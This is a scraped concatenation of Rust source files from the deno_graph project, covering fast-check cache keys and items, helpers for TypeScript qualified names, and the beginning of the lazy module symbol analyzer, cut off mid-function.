/* prefer types */ true,
) && let Some(dep_nv) = self
.url_converter
.registry_package_url_to_nv(specifier)
{
if dep_nv == *pkg_nv {
// just add this specifier
self.add_pending_trace(
&dep_nv,
specifier,
if parts.is_empty() {
ImportedExports::star_with_default()
} else {
ImportedExports::subset(
NamedSubset::from_parts(&parts),
)
},
);
} else {
// need to analyze the whole package
self.add_pending_nv(&dep_nv, pkg_nv);
}
}
}
}
}
}
}
}
}
pending_traces.traces.extend(
symbol
.exports()
.values()
.map(|id| (*id, symbol.symbol_id()))
.chain(
symbol.members().iter().map(|id| (*id, symbol.symbol_id())),
)
.filter(|(symbol_id, _referrer_id)| {
!pending_traces.done_id_traces.contains(symbol_id)
})
.map(|(symbol_id, referrer_id)| PendingIdTrace::Id {
symbol_id,
referrer_id,
}),
);
}
PendingIdTrace::QualifiedId {
symbol_id,
parts,
referrer_id,
} => {
let symbol = module_info.symbol(symbol_id).unwrap();
let mut handled = false;
for decl in symbol.decls() {
log::trace!(
"Found decl - {}",
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/cache.rs | src/fast_check/cache.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::BTreeSet;
use std::sync::Arc;
use deno_semver::package::PackageNv;
use serde::Deserialize;
use serde::Serialize;
use crate::ModuleSpecifier;
/// Cache key that's a hash of the package name, version, and
/// sorted export names.
///
/// The wrapped value is the 64-bit hash produced by
/// [`FastCheckCacheKey::build`].
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd)]
pub struct FastCheckCacheKey(u64);
impl FastCheckCacheKey {
  /// Builds a cache key by hashing the seed, the package name/version,
  /// and each entrypoint (the `BTreeSet` guarantees a stable order).
  #[cfg(feature = "fast_check")]
  pub fn build(
    hash_seed: &'static str,
    package_nv: &PackageNv,
    entrypoints: &BTreeSet<ModuleSpecifier>,
  ) -> Self {
    use std::hash::Hash;
    use std::hash::Hasher;
    let mut hasher = twox_hash::XxHash64::default();
    hash_seed.hash(&mut hasher);
    package_nv.hash(&mut hasher);
    entrypoints
      .iter()
      .for_each(|entrypoint| entrypoint.hash(&mut hasher));
    Self(hasher.finish())
  }

  /// The raw key value.
  pub fn as_u64(&self) -> u64 {
    self.0
  }
}
// On successful fast check, the value in the hash is a list of files
// used, these files' hashes, and the package's dependencies that are
// used in fast check (not any deps that aren't). The cache is invalidated
// when any of these files change.
//
// On failure, the value in the hash is the entrypoint files along with
// any imported file until a diagnostic is found. These hashes are stored
// so that the cache can be invalidated when any of them change.
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct FastCheckCacheItem {
  pub dependencies: BTreeSet<PackageNv>, // ordered for determinism when deserializing
  // each module involved in the check, paired with its cached result
  pub modules: Vec<(ModuleSpecifier, FastCheckCacheModuleItem)>,
}
/// A single module's entry in a cache item: either stored fast check
/// output (`Info`) or a marker that a diagnostic occurred (`Diagnostic`).
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub enum FastCheckCacheModuleItem {
  Info(FastCheckCacheModuleItemInfo),
  Diagnostic(FastCheckCacheModuleItemDiagnostic),
}
impl FastCheckCacheModuleItem {
pub fn source_hash(&self) -> u64 {
match self {
FastCheckCacheModuleItem::Info(info) => info.source_hash,
FastCheckCacheModuleItem::Diagnostic(diagnostic) => {
diagnostic.source_hash
}
}
}
}
/// Stored fast check output for a module.
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct FastCheckCacheModuleItemInfo {
  // hash of the module's source at the time the entry was created
  pub source_hash: u64,
  /// Serialized module_info as JSON because bincode (used in the CLI's cache)
  /// doesn't work well with the ModuleInfo since it makes heavy use of
  /// skip_serializing_if.
  pub module_info: String,
  // the fast-checked module text
  pub text: Arc<str>,
  // source map associated with `text`
  pub source_map: Arc<str>,
}
/// Marker that fast check hit a diagnostic for a module; only the source
/// hash is kept so the entry can be invalidated when the source changes.
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct FastCheckCacheModuleItemDiagnostic {
  // hash of the module's source at the time the entry was created
  pub source_hash: u64,
}
/// Cache for storing the results of fast checks based on a package.
pub trait FastCheckCache {
  /// Seed that is provided to the hash in order to cache bust
  /// it on version changes.
  ///
  /// This defaults to the current deno_graph version.
  fn hash_seed(&self) -> &'static str {
    env!("CARGO_PKG_VERSION")
  }

  /// Looks up a previously stored item by its key.
  fn get(&self, key: FastCheckCacheKey) -> Option<FastCheckCacheItem>;

  /// Stores an item under the given key.
  fn set(&self, key: FastCheckCacheKey, value: FastCheckCacheItem);
}
/// Computes a fast, non-cryptographic 64-bit hash of `bytes`
/// (suitable for cache invalidation, not for security).
#[cfg(feature = "fast_check")]
pub(crate) fn fast_insecure_hash(bytes: &[u8]) -> u64 {
  use std::hash::{Hash, Hasher};
  let mut hasher = twox_hash::XxHash64::default();
  Hash::hash(bytes, &mut hasher);
  hasher.finish()
}
#[cfg(test)]
mod test {
  #[test]
  fn module_item_info_serialization() {
    // round-trip an Info item through bincode to ensure the cache's
    // serialized form stays stable for consumers that persist it
    let item = super::FastCheckCacheModuleItem::Info(
      super::FastCheckCacheModuleItemInfo {
        source_hash: 0,
        module_info: Default::default(),
        text: "test".to_string().into(),
        source_map: "012".to_string().into(),
      },
    );
    let data = bincode::serialize(&item).unwrap();
    let result = bincode::deserialize(&data).unwrap();
    assert_eq!(item, result);
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/swc_helpers.rs | src/symbols/swc_helpers.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use deno_ast::swc::ast::Id;
use deno_ast::swc::ast::TsEntityName;
use deno_ast::swc::ast::TsQualifiedName;
/// Splits a `TsEntityName` into its root identifier id and the trailing
/// property-name parts (empty for a plain identifier).
pub fn ts_entity_name_to_parts(
  entity_name: &TsEntityName,
) -> (Id, Vec<String>) {
  match entity_name {
    // a bare identifier has no qualified parts
    TsEntityName::Ident(ident) => (ident.to_id(), Vec::new()),
    TsEntityName::TsQualifiedName(qualified_name) => {
      ts_qualified_name_parts(qualified_name)
    }
  }
}
/// Flattens a qualified name like `a.b.c` into the root identifier id
/// (`a`) and the remaining parts in source order (`["b", "c"]`).
pub fn ts_qualified_name_parts(
  mut qualified_name: &TsQualifiedName,
) -> (Id, Vec<String>) {
  // walk leftward through the chain, collecting right-hand names
  let mut collected = Vec::new();
  let root_id = loop {
    collected.push(qualified_name.right.sym.to_string());
    match &qualified_name.left {
      TsEntityName::TsQualifiedName(inner) => qualified_name = inner,
      TsEntityName::Ident(ident) => break ident.to_id(),
    }
  };
  // names were gathered right-to-left, so restore source order
  collected.reverse();
  (root_id, collected)
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/analyzer.rs | src/symbols/analyzer.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::cell::Cell;
use std::cell::Ref;
use std::cell::RefCell;
use std::hash::Hash;
use deno_ast::MediaType;
use deno_ast::ModuleSpecifier;
use deno_ast::ParsedSource;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::SourceTextInfo;
use deno_ast::swc::ast::*;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::utils::find_pat_ids;
use deno_ast::swc::utils::is_valid_ident;
use indexmap::IndexMap;
use indexmap::IndexSet;
use crate::JsModule;
use crate::JsonModule;
use crate::ModuleGraph;
use crate::ast::EsParser;
use crate::ast::ParseOptions;
use crate::graph::WasmModule;
use super::ResolvedSymbolDepEntry;
use super::SymbolNodeDep;
use super::collections::AdditiveOnlyIndexMap;
use super::collections::AdditiveOnlyIndexMapForCopyValues;
use super::collections::AdditiveOnlyMap;
use super::collections::AdditiveOnlyMapForCopyValues;
use super::cross_module;
use super::cross_module::Definition;
use super::cross_module::DefinitionOrUnresolved;
use super::cross_module::DefinitionPathNode;
use super::cross_module::ModuleExports;
use super::dep_analyzer::ResolveDepsMode;
use super::swc_helpers::ts_entity_name_to_parts;
/// The root symbol from which module symbols can be retrieved.
///
/// Building the symbols for modules is lazy.
pub struct RootSymbol<'a> {
  module_graph: &'a ModuleGraph,
  parser: &'a dyn EsParser,
  // lookup of already-analyzed specifiers to their assigned module id
  specifiers_to_ids: AdditiveOnlyMapForCopyValues<ModuleSpecifier, ModuleId>,
  // storage of analyzed modules, keyed by module id
  ids_to_modules: AdditiveOnlyMap<ModuleId, ModuleInfo>,
}
impl<'a> RootSymbol<'a> {
  /// Creates a new root symbol over `module_graph`, using `parser` to
  /// lazily parse modules as they are requested.
  pub fn new(module_graph: &'a ModuleGraph, parser: &'a dyn EsParser) -> Self {
    Self {
      module_graph,
      parser,
      specifiers_to_ids: Default::default(),
      ids_to_modules: Default::default(),
    }
  }

  /// Checks if a specifier has been analyzed before.
  ///
  /// This does not lazily analyze the module.
  pub fn has_analyzed(&self, specifier: &ModuleSpecifier) -> bool {
    self.specifiers_to_ids.contains_key(specifier)
  }

  /// Gets a module from the provided specifier. This will lazily analyze
  /// the module if it has not already been analyzed.
  pub fn module_from_specifier(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<ModuleInfoRef<'_>> {
    // fast path: already analyzed
    if let Some(module_id) = self.specifiers_to_ids.get(specifier) {
      let module_symbol = self.ids_to_modules.get(&module_id).unwrap();
      return Some(module_symbol.as_ref());
    }

    let graph_module = self.module_graph.get(specifier)?;
    match graph_module {
      // for a JS module, prefer analyzing its types dependency when it
      // has one, falling back to the module itself
      crate::Module::Js(js_module) => js_module
        .maybe_types_dependency
        .as_ref()
        .and_then(|types| {
          types.dependency.maybe_specifier().and_then(|specifier| {
            // shouldn't happen, but prevent circular loops
            if specifier != &js_module.specifier {
              self.module_from_specifier(specifier)
            } else {
              None
            }
          })
        })
        .or_else(|| self.analyze_js_module(js_module)),
      crate::Module::Json(json_module) => {
        Some(self.analyze_json_module(json_module))
      }
      crate::Module::Wasm(wasm_module) => self.analyze_wasm_module(wasm_module),
      // these module kinds have no symbols to analyze here
      crate::Module::Npm(_)
      | crate::Module::Node(_)
      | crate::Module::External(_) => None,
    }
  }

  /// Gets an already-analyzed module by its id, if present.
  pub fn module_from_id(
    &self,
    module_id: ModuleId,
  ) -> Option<ModuleInfoRef<'_>> {
    self.ids_to_modules.get(&module_id).map(|s| s.as_ref())
  }

  /// Goes to the definitions of the specified symbol.
  pub fn go_to_definitions<'b>(
    &'b self,
    module: ModuleInfoRef<'b>,
    symbol: &'b Symbol,
  ) -> impl Iterator<Item = Definition<'b>> {
    self
      .find_definition_paths(module, symbol)
      .into_iter()
      .flat_map(|d| d.into_definitions())
  }

  /// Goes to the definitions of the specified symbol.
  pub fn go_to_definitions_or_unresolveds<'b>(
    &'b self,
    module: ModuleInfoRef<'b>,
    symbol: &'b Symbol,
  ) -> impl Iterator<Item = DefinitionOrUnresolved<'b>> {
    self
      .find_definition_paths(module, symbol)
      .into_iter()
      .flat_map(|d| d.into_definitions_or_unresolveds())
  }

  /// Finds the graph paths to the definition of the specified symbol.
  pub fn find_definition_paths<'b>(
    &'b self,
    module: ModuleInfoRef<'b>,
    symbol: &'b Symbol,
  ) -> Vec<DefinitionPathNode<'b>> {
    debug_assert_eq!(symbol.module_id(), module.module_id());
    super::cross_module::find_definition_paths(
      self.module_graph,
      module,
      symbol,
      &|specifier| self.module_from_specifier(specifier),
    )
  }

  /// Resolves a symbol dependency to the entries it refers to, lazily
  /// analyzing other modules as needed via `module_from_specifier`.
  pub fn resolve_symbol_dep<'b>(
    &'b self,
    module: ModuleInfoRef<'b>,
    dep: &SymbolNodeDep,
  ) -> Vec<ResolvedSymbolDepEntry<'b>> {
    super::cross_module::resolve_symbol_dep(
      self.module_graph,
      module,
      dep,
      &|specifier| self.module_from_specifier(specifier),
    )
  }

  /// Parses and analyzes a JS/TS module; `None` when parsing fails.
  fn analyze_js_module(
    &self,
    script_module: &JsModule,
  ) -> Option<ModuleInfoRef<'_>> {
    let Ok(source) = self.parsed_source(script_module) else {
      return None;
    };
    Some(self.build_raw_es_module_info(&script_module.specifier, &source))
  }

  /// Builds symbol info for a JSON module: a module symbol (id 0) with a
  /// single "default" export symbol (id 1) covering the JSON value.
  fn analyze_json_module(&self, json_module: &JsonModule) -> ModuleInfoRef<'_> {
    let specifier = &json_module.specifier;
    // it's not ideal having to use SourceTextInfo here, but it makes
    // it easier to interop with ParsedSource
    let source_text_info = SourceTextInfo::new(json_module.source.text.clone());
    let range = source_text_info.range();
    let module_id = ModuleId(self.ids_to_modules.len() as u32);
    let decls = {
      // shrink the decl range to exclude surrounding whitespace
      let range = {
        let source = source_text_info.text_str();
        let start_whitespace_len = source.len() - source.trim_start().len();
        let end_whitespace_len = source.len() - source.trim_end().len();
        SourceRange::new(
          range.start + start_whitespace_len,
          range.end - end_whitespace_len,
        )
      };
      Vec::from([SymbolDecl::new(
        SymbolDeclKind::Definition(SymbolNode(SymbolNodeInner::Json)),
        range,
      )])
    };
    let module_symbol = JsonModuleInfo {
      specifier: specifier.clone(),
      module_id,
      module_symbol: Symbol {
        module_id,
        symbol_id: SymbolId(0),
        parent_id: None,
        exports: IndexMap::from([("default".to_string(), SymbolId(1))]),
        child_ids: IndexSet::from([SymbolId(1)]),
        decls: decls.clone(),
        members: Default::default(),
      },
      default_symbol: Symbol {
        module_id,
        symbol_id: SymbolId(1),
        parent_id: Some(SymbolId(0)),
        decls,
        child_ids: Default::default(),
        exports: Default::default(),
        members: Default::default(),
      },
      source_text_info,
    };
    self.finalize_insert(ModuleInfo::Json(Box::new(module_symbol)))
  }

  /// Analyzes a Wasm module via its generated .d.ts source; `None` when
  /// that source fails to parse.
  fn analyze_wasm_module(
    &self,
    wasm_module: &WasmModule,
  ) -> Option<ModuleInfoRef<'_>> {
    let maybe_parsed_source = self.parser.parse_program(ParseOptions {
      specifier: &wasm_module.specifier,
      source: wasm_module.source_dts.clone(),
      media_type: MediaType::Dmts,
      scope_analysis: true,
    });
    let Ok(source) = maybe_parsed_source else {
      return None;
    };
    Some(self.build_raw_es_module_info(&wasm_module.specifier, &source))
  }

  /// Walks a parsed program, filling in its symbols, and stores the
  /// result as an ES module info.
  fn build_raw_es_module_info(
    &self,
    specifier: &ModuleSpecifier,
    source: &ParsedSource,
  ) -> ModuleInfoRef<'_> {
    let program = source.program();
    let module_id = ModuleId(self.ids_to_modules.len() as u32);
    let builder = ModuleBuilder::new(module_id);
    let filler = SymbolFiller {
      source,
      builder: &builder,
    };
    filler.fill(program.as_ref());
    let module_symbol = EsModuleInfo {
      specifier: specifier.clone(),
      module_id,
      source: source.clone(),
      re_exports: builder.re_exports.take(),
      swc_id_to_symbol_id: builder.swc_id_to_symbol_id.take(),
      symbols: builder
        .symbols
        .take()
        .into_iter()
        .map(|(k, v)| (k, v.0.into_inner()))
        .collect(),
    };
    self.finalize_insert(ModuleInfo::Esm(module_symbol))
  }

  /// Registers the analyzed module in both lookup maps and returns a
  /// reference to the stored value.
  fn finalize_insert(&self, module: ModuleInfo) -> ModuleInfoRef<'_> {
    self
      .specifiers_to_ids
      .insert(module.specifier().clone(), module.module_id());
    let module_id = module.module_id();
    self.ids_to_modules.insert(module_id, module);
    self.ids_to_modules.get(&module_id).unwrap().as_ref()
  }

  /// Parses the JS module's source with scope analysis enabled.
  fn parsed_source(
    &self,
    graph_module: &JsModule,
  ) -> Result<ParsedSource, deno_ast::ParseDiagnostic> {
    self.parser.parse_program(ParseOptions {
      specifier: &graph_module.specifier,
      source: graph_module.source.text.clone(),
      media_type: graph_module.media_type,
      scope_analysis: true,
    })
  }
}
/// How a file dependency is imported: everything (`Star`) or a single
/// named export (`Name`).
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub enum FileDepName {
  Star,
  Name(String),
}

impl FileDepName {
  /// The export name, or `None` for a star import.
  pub fn maybe_name(&self) -> Option<&str> {
    if let FileDepName::Name(name) = self {
      Some(name.as_str())
    } else {
      None
    }
  }
}
/// A dependency on another file.
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub struct FileDep {
  // what is imported: a single name or everything
  pub name: FileDepName,
  // the raw (unresolved) specifier text of the dependency
  pub specifier: String,
}
/// Identifier assigned to an analyzed module.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd)]
pub struct ModuleId(u32);

impl std::fmt::Display for ModuleId {
  fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
    // display as the bare numeric id
    f.write_str(&self.0.to_string())
  }
}
/// Identifier for a symbol within a module.
#[derive(Default, Copy, Clone, Eq, PartialEq, Hash, Ord, PartialOrd)]
pub struct SymbolId(u32);

impl std::fmt::Debug for SymbolId {
  fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
    // for less verbose debugging, print just the bare number
    f.write_str(&self.0.to_string())
  }
}
/// Holds a raw pointer to a node owned by a `ParsedSource` while keeping a
/// clone of that source alive, so the pointer stays valid for this value's
/// lifetime (see `NodeRefBox::unsafe_new` for the invariant).
#[derive(Clone)]
pub struct NodeRefBox<T> {
  // the parsed source needs to be kept alive for the duration of the value
  source: ParsedSource,
  // raw pointer into `source`; dereferenced in `value()` under the
  // invariant above
  value: *const T,
}
impl<T> std::fmt::Debug for NodeRefBox<T> {
  fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
    // Report the actual type name (previously said "DeclRef", an apparent
    // leftover from a rename). The pointed-to value is omitted rather than
    // dereferenced here.
    f.debug_struct("NodeRefBox")
      .field("value", &"<omitted>")
      .finish()
  }
}
impl<T> NodeRefBox<T> {
  /// WARNING: Ensure that T is a reference inside ParsedSource. Otherwise
  /// this is entirely unsafe.
  fn unsafe_new(parsed_source: &ParsedSource, value: &T) -> Self {
    Self {
      // cloning the source keeps it alive, which is what makes the raw
      // pointer below valid for this struct's lifetime
      source: parsed_source.clone(),
      value: value as *const _,
    }
  }

  /// Dereferences the stored pointer into the kept-alive source.
  fn value(&self) -> &T {
    // SAFETY: This is safe because the parsed source is kept alive for the
    // duration of this struct and the reference is within the parsed source.
    unsafe { &*self.value }
  }

  /// The parsed source the value points into.
  fn source(&self) -> &ParsedSource {
    &self.source
  }
}
/// Handle to the AST node that declared a symbol (or `Json` for JSON
/// modules, which have no AST).
#[derive(Clone)]
pub struct SymbolNode(SymbolNodeInner);
impl std::fmt::Debug for SymbolNode {
  fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
    // Debug output is the source text backing the node, which is far more
    // useful than a structural dump of the AST.
    macro_rules! node_text {
      ($d:expr) => {
        $d.value().text_fast($d.source.text_info_lazy()).to_string()
      };
    }
    let text = match &self.0 {
      SymbolNodeInner::Json => "<json>".to_string(),
      SymbolNodeInner::Module(d) => node_text!(d),
      SymbolNodeInner::ClassDecl(d) => node_text!(d),
      SymbolNodeInner::ExportDecl(d, _) => node_text!(d),
      SymbolNodeInner::ExportDefaultDecl(d) => node_text!(d),
      SymbolNodeInner::ExportDefaultExpr(d) => node_text!(d),
      SymbolNodeInner::FnDecl(d) => node_text!(d),
      SymbolNodeInner::TsEnum(d) => node_text!(d),
      SymbolNodeInner::TsNamespace(d) => node_text!(d),
      SymbolNodeInner::TsTypeAlias(d) => node_text!(d),
      SymbolNodeInner::TsInterface(d) => node_text!(d),
      // variable declarators also render the bound identifier
      SymbolNodeInner::Var(d, _, ident) => {
        format!(
          "{}: {}",
          ident.sym,
          d.value().text_fast(d.source.text_info_lazy())
        )
      }
      SymbolNodeInner::UsingVar(d, _, ident) => {
        format!(
          "{}: {}",
          ident.sym,
          d.value().text_fast(d.source.text_info_lazy())
        )
      }
      SymbolNodeInner::AutoAccessor(d) => node_text!(d),
      SymbolNodeInner::ClassMethod(d) => node_text!(d),
      SymbolNodeInner::ClassProp(d) => node_text!(d),
      SymbolNodeInner::ClassParamProp(d) => node_text!(d),
      SymbolNodeInner::Constructor(d) => node_text!(d),
      SymbolNodeInner::ExpandoProperty(d) => node_text!(d),
      SymbolNodeInner::TsIndexSignature(d) => node_text!(d),
      SymbolNodeInner::TsCallSignatureDecl(d) => node_text!(d),
      SymbolNodeInner::TsConstructSignatureDecl(d) => node_text!(d),
      SymbolNodeInner::TsPropertySignature(d) => node_text!(d),
      SymbolNodeInner::TsGetterSignature(d) => node_text!(d),
      SymbolNodeInner::TsSetterSignature(d) => node_text!(d),
      SymbolNodeInner::TsMethodSignature(d) => node_text!(d),
    };
    f.debug_tuple("SymbolNode").field(&text).finish()
  }
}
impl SymbolNode {
  /// The declared name of the underlying node, if it has one.
  pub fn maybe_name(&self) -> Option<Cow<'_, str>> {
    self.maybe_ref().and_then(|r| r.maybe_name())
  }

  /// A borrowed view of the underlying AST node, if any
  /// (`None` for JSON modules).
  pub fn maybe_ref(&self) -> Option<SymbolNodeRef<'_>> {
    self.maybe_ref_and_source().map(|(n, _)| n)
  }

  /// A borrowed view of the underlying AST node along with the parsed
  /// source that owns it, if any (`None` for JSON modules).
  pub fn maybe_ref_and_source(
    &self,
  ) -> Option<(SymbolNodeRef<'_>, &ParsedSource)> {
    match &self.0 {
      // JSON modules carry no AST node
      SymbolNodeInner::Json => None,
      SymbolNodeInner::Module(n) => {
        Some((SymbolNodeRef::Module(n.value()), n.source()))
      }
      SymbolNodeInner::ClassDecl(n) => {
        Some((SymbolNodeRef::ClassDecl(n.value()), n.source()))
      }
      // export decls additionally expose the specific inner declaration
      SymbolNodeInner::ExportDecl(export_decl, inner) => Some((
        SymbolNodeRef::ExportDecl(
          export_decl.value(),
          match inner {
            SymbolNodeInnerExportDecl::Class(n) => {
              ExportDeclRef::Class(n.value())
            }
            SymbolNodeInnerExportDecl::Fn(n) => ExportDeclRef::Fn(n.value()),
            SymbolNodeInnerExportDecl::Var(decl, declarator, id) => {
              ExportDeclRef::Var(decl.value(), declarator.value(), id)
            }
            SymbolNodeInnerExportDecl::TsEnum(n) => {
              ExportDeclRef::TsEnum(n.value())
            }
            SymbolNodeInnerExportDecl::TsInterface(n) => {
              ExportDeclRef::TsInterface(n.value())
            }
            SymbolNodeInnerExportDecl::TsNamespace(n) => {
              ExportDeclRef::TsModule(n.value())
            }
            SymbolNodeInnerExportDecl::TsTypeAlias(n) => {
              ExportDeclRef::TsTypeAlias(n.value())
            }
          },
        ),
        export_decl.source(),
      )),
      SymbolNodeInner::ExportDefaultDecl(n) => {
        Some((SymbolNodeRef::ExportDefaultDecl(n.value()), n.source()))
      }
      SymbolNodeInner::ExportDefaultExpr(n) => {
        Some((SymbolNodeRef::ExportDefaultExpr(n.value()), n.source()))
      }
      SymbolNodeInner::FnDecl(n) => {
        Some((SymbolNodeRef::FnDecl(n.value()), n.source()))
      }
      SymbolNodeInner::TsEnum(n) => {
        Some((SymbolNodeRef::TsEnum(n.value()), n.source()))
      }
      SymbolNodeInner::TsNamespace(n) => {
        Some((SymbolNodeRef::TsNamespace(n.value()), n.source()))
      }
      SymbolNodeInner::TsTypeAlias(n) => {
        Some((SymbolNodeRef::TsTypeAlias(n.value()), n.source()))
      }
      SymbolNodeInner::TsInterface(n) => {
        Some((SymbolNodeRef::TsInterface(n.value()), n.source()))
      }
      SymbolNodeInner::Var(decl, declarator, ident) => Some((
        SymbolNodeRef::Var(decl.value(), declarator.value(), ident),
        decl.source(),
      )),
      SymbolNodeInner::UsingVar(decl, declarator, ident) => Some((
        SymbolNodeRef::UsingVar(decl.value(), declarator.value(), ident),
        decl.source(),
      )),
      SymbolNodeInner::AutoAccessor(n) => {
        Some((SymbolNodeRef::AutoAccessor(n.value()), n.source()))
      }
      SymbolNodeInner::ClassMethod(n) => {
        Some((SymbolNodeRef::ClassMethod(n.value()), n.source()))
      }
      SymbolNodeInner::ClassProp(n) => {
        Some((SymbolNodeRef::ClassProp(n.value()), n.source()))
      }
      SymbolNodeInner::ClassParamProp(n) => {
        Some((SymbolNodeRef::ClassParamProp(n.value()), n.source()))
      }
      SymbolNodeInner::Constructor(n) => {
        Some((SymbolNodeRef::Constructor(n.value()), n.source()))
      }
      SymbolNodeInner::ExpandoProperty(n) => Some((
        SymbolNodeRef::ExpandoProperty(ExpandoPropertyRef(n.value())),
        n.source(),
      )),
      SymbolNodeInner::TsIndexSignature(n) => {
        Some((SymbolNodeRef::TsIndexSignature(n.value()), n.source()))
      }
      SymbolNodeInner::TsCallSignatureDecl(n) => {
        Some((SymbolNodeRef::TsCallSignatureDecl(n.value()), n.source()))
      }
      SymbolNodeInner::TsConstructSignatureDecl(n) => Some((
        SymbolNodeRef::TsConstructSignatureDecl(n.value()),
        n.source(),
      )),
      SymbolNodeInner::TsPropertySignature(n) => {
        Some((SymbolNodeRef::TsPropertySignature(n.value()), n.source()))
      }
      SymbolNodeInner::TsGetterSignature(n) => {
        Some((SymbolNodeRef::TsGetterSignature(n.value()), n.source()))
      }
      SymbolNodeInner::TsSetterSignature(n) => {
        Some((SymbolNodeRef::TsSetterSignature(n.value()), n.source()))
      }
      SymbolNodeInner::TsMethodSignature(n) => {
        Some((SymbolNodeRef::TsMethodSignature(n.value()), n.source()))
      }
    }
  }
}
/// The specific declaration kept inside an `export ...` statement.
#[derive(Debug, Clone)]
enum SymbolNodeInnerExportDecl {
  Class(NodeRefBox<ClassDecl>),
  Fn(NodeRefBox<FnDecl>),
  // the declarator and the specific binding identifier within it
  Var(NodeRefBox<VarDecl>, NodeRefBox<VarDeclarator>, Ident),
  TsEnum(NodeRefBox<TsEnumDecl>),
  TsInterface(NodeRefBox<TsInterfaceDecl>),
  TsNamespace(NodeRefBox<TsModuleDecl>),
  TsTypeAlias(NodeRefBox<TsTypeAliasDecl>),
}
/// Owned storage behind `SymbolNode` — one variant per kind of
/// declaration or member a symbol can be backed by.
#[derive(Debug, Clone)]
enum SymbolNodeInner {
  // JSON modules have no AST node
  Json,
  Module(NodeRefBox<Program>),
  ClassDecl(NodeRefBox<ClassDecl>),
  ExportDecl(NodeRefBox<ExportDecl>, SymbolNodeInnerExportDecl),
  ExportDefaultDecl(NodeRefBox<ExportDefaultDecl>),
  ExportDefaultExpr(NodeRefBox<ExportDefaultExpr>),
  FnDecl(NodeRefBox<FnDecl>),
  TsEnum(NodeRefBox<TsEnumDecl>),
  TsNamespace(NodeRefBox<TsModuleDecl>),
  TsTypeAlias(NodeRefBox<TsTypeAliasDecl>),
  TsInterface(NodeRefBox<TsInterfaceDecl>),
  // declaration, declarator, and the specific binding identifier
  Var(NodeRefBox<VarDecl>, NodeRefBox<VarDeclarator>, Ident),
  UsingVar(NodeRefBox<UsingDecl>, NodeRefBox<VarDeclarator>, Ident),
  // class/interface members
  AutoAccessor(NodeRefBox<AutoAccessor>),
  ClassMethod(NodeRefBox<ClassMethod>),
  ClassProp(NodeRefBox<ClassProp>),
  ClassParamProp(NodeRefBox<TsParamProp>),
  Constructor(NodeRefBox<Constructor>),
  ExpandoProperty(NodeRefBox<AssignExpr>),
  TsIndexSignature(NodeRefBox<TsIndexSignature>),
  TsCallSignatureDecl(NodeRefBox<TsCallSignatureDecl>),
  TsConstructSignatureDecl(NodeRefBox<TsConstructSignatureDecl>),
  TsPropertySignature(NodeRefBox<TsPropertySignature>),
  TsGetterSignature(NodeRefBox<TsGetterSignature>),
  TsSetterSignature(NodeRefBox<TsSetterSignature>),
  TsMethodSignature(NodeRefBox<TsMethodSignature>),
}
/// Borrowed view of the declaration inside an `export ...` statement.
#[derive(Debug, Clone, Copy)]
pub enum ExportDeclRef<'a> {
  Class(&'a ClassDecl),
  Fn(&'a FnDecl),
  // declaration, declarator, and the specific binding identifier
  Var(&'a VarDecl, &'a VarDeclarator, &'a Ident),
  TsEnum(&'a TsEnumDecl),
  TsInterface(&'a TsInterfaceDecl),
  TsModule(&'a TsModuleDecl),
  TsTypeAlias(&'a TsTypeAliasDecl),
}
/// Borrowed view of the AST node backing a symbol.
#[derive(Debug, Clone, Copy)]
pub enum SymbolNodeRef<'a> {
  Module(&'a Program),
  ExportDecl(&'a ExportDecl, ExportDeclRef<'a>),
  ExportDefaultDecl(&'a ExportDefaultDecl),
  ExportDefaultExpr(&'a ExportDefaultExpr),
  ClassDecl(&'a ClassDecl),
  FnDecl(&'a FnDecl),
  TsEnum(&'a TsEnumDecl),
  TsInterface(&'a TsInterfaceDecl),
  TsNamespace(&'a TsModuleDecl),
  TsTypeAlias(&'a TsTypeAliasDecl),
  // declaration, declarator, and the specific binding identifier
  Var(&'a VarDecl, &'a VarDeclarator, &'a Ident),
  UsingVar(&'a UsingDecl, &'a VarDeclarator, &'a Ident),
  // members
  AutoAccessor(&'a AutoAccessor),
  ClassMethod(&'a ClassMethod),
  ClassProp(&'a ClassProp),
  ClassParamProp(&'a TsParamProp),
  Constructor(&'a Constructor),
  ExpandoProperty(ExpandoPropertyRef<'a>),
  TsIndexSignature(&'a TsIndexSignature),
  TsCallSignatureDecl(&'a TsCallSignatureDecl),
  TsConstructSignatureDecl(&'a TsConstructSignatureDecl),
  TsPropertySignature(&'a TsPropertySignature),
  TsGetterSignature(&'a TsGetterSignature),
  TsSetterSignature(&'a TsSetterSignature),
  TsMethodSignature(&'a TsMethodSignature),
}
impl<'a> SymbolNodeRef<'a> {
  /// The local name of the node, if it has a name.
  pub fn maybe_name(&self) -> Option<Cow<'a, str>> {
